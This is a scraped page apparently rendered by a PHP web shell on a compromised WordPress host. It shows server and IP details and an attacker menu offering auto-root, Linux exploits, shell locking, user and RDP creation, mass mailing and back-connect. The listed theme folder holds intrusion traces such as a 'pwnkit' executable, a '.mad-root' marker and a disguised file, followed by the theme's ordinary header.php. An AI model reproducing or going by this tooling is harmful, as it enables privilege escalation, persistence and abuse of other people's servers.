Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
arise /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
tgm
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.58
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
5.76
KB
-rw-r--r--
comments.php
1.16
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
3.59
KB
-rw-r--r--
footer.php
3.28
KB
-rw-r--r--
functions.php
10.68
KB
-rw-r--r--
functionsbak.php
10.19
KB
-rw-r--r--
header.php
5.03
KB
-rw-r--r--
index.php
1.31
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
navigation.php
677
B
-rw-r--r--
page.php
2.29
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
4.58
KB
-rw-r--r--
screenshot.png
988.36
KB
-rw-r--r--
search.php
1.3
KB
-rw-r--r--
searchform.php
865
B
-rw-r--r--
sidebar.php
1.24
KB
-rw-r--r--
single.php
5.03
KB
-rw-r--r--
style.css
85.71
KB
-rw-r--r--
woocommerce.php
1.53
KB
-rw-r--r--
wpml-config.xml
714
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * Displays the header content * * @package Theme Freesia * @subpackage Arise * @since Arise 1.0 */ ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <?php $arise_settings = arise_get_theme_options(); ?> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <div id="page" class="hfeed site"> <!-- Masthead ============================================= --> <header id="masthead" class="site-header"> <?php $arise_top_bar = $arise_settings['arise_top_bar']; if (( has_nav_menu( 'social-link' ) || has_nav_menu( 'topmenu' ) || is_active_sidebar( 'arise_header_info' )) && $arise_top_bar ==0): if($header_image = $arise_settings['arise_display_header_image'] == 'top'){ do_action('arise_header_image'); } echo '<div class="top-info-bar"> <div class="container clearfix">'; if(has_nav_menu('topmenu')): $args = array( 'theme_location' => 'topmenu', 'container' => '', 'items_wrap' => '<ul>%3$s</ul>', ); echo '<div class="min-nav clearfix">'; wp_nav_menu($args); echo '</div>'.'<!-- end .min-nav -->'; endif; if(has_nav_menu('social-link') && $arise_settings['arise_top_social_icons'] == 0): echo '<div class="header-social-block">'; do_action('social_links'); echo '</div>'.'<!-- end .header-social-block -->'; endif; if( is_active_sidebar( 'arise_header_info' )) { dynamic_sidebar( 'arise_header_info' ); } echo '</div> <!-- end .container --> </div> <!-- end .top-info-bar -->'; endif; if($header_image = $arise_settings['arise_display_header_image'] == 'below'){ do_action('arise_header_image'); } ?> <!-- Main Header============================================= --> <div id="sticky_header" class="clearfix"> <div class="container clearfix"> <?php do_action('arise_site_branding'); ?> <div class="menu-toggle"> <div class="line-one"></div> <div class="line-two"></div> <div class="line-three"></div> </div> <!-- Main Nav ============================================= --> <div class="navbar-right"> <?php if (has_nav_menu('primary')) { ?> <?php $args = array( 'theme_location' => 'primary', 'container' => '', 'items_wrap' => '<ul class="menu">%3$s</ul>', ); ?> <nav id="site-navigation" class="main-navigation clearfix"> <?php wp_nav_menu($args);//extract the content from apperance-> nav menu ?> </nav> <!-- end #site-navigation --> <?php } else {// extract the content from page menu only ?> <nav id="site-navigation" class="main-navigation clearfix"> <?php wp_page_menu(array('menu_class' => 'menu')); ?> </nav> <!-- end #site-navigation --> <?php } $search_form = $arise_settings['arise_search_custom_header']; if (1 != $search_form) { ?> <div id="search-toggle" class="header-search"></div> <div id="search-box" class="clearfix"> <?php get_search_form();?> </div> <!-- end #search-box --> <?php } ?> </div> <!-- end .navbar-right --> </div> <!-- end .container --> </div> <!-- end #sticky_header --> <div class="header-line"></div> <?php $enable_slider = $arise_settings['arise_enable_slider']; arise_slider_value(); if ($enable_slider=='frontpage'|| $enable_slider=='enitresite'){ if(is_front_page() && ($enable_slider=='frontpage') ) { if($arise_settings['arise_slider_type'] == 'default_slider') { arise_page_sliders(); }else{ if(class_exists('Arise_Plus_Features')): arise_image_sliders(); endif; } } if($enable_slider=='enitresite'){ if($arise_settings['arise_slider_type'] == 'default_slider') { arise_page_sliders(); }else{ if(class_exists('Arise_Plus_Features')): arise_image_sliders(); endif; } } } if(!is_page_template('page-templates/arise-corporate.php') && !is_page_template('alter-front-page-template.php')) { if (('' != arise_header_title()) || function_exists('bcn_display_list')) { if(is_home()){ echo ''; } else { ?> <div class="container"> <div class="page-header clearfix"> <h1 class="page-title"><?php echo arise_header_title();?></h1> <!-- .page-title --> <?php arise_breadcrumb(); ?> </div> <!-- .page-header --> </div> <!-- .container --> <?php } } } ?> </header> <!-- end #masthead --> <!-- Main Page Start ============================================= --> <div id="content"> <?php if (!is_page_template('page-templates/arise-corporate.php') ){ if(is_page_template('three-column-blog-template.php') || is_page_template('our-team-template.php') || is_page_template('about-us-template.php') || is_page_template('important-works-template.php') ){ echo ''; }else{?> <div class="container clearfix"> <?php } } ?>
Close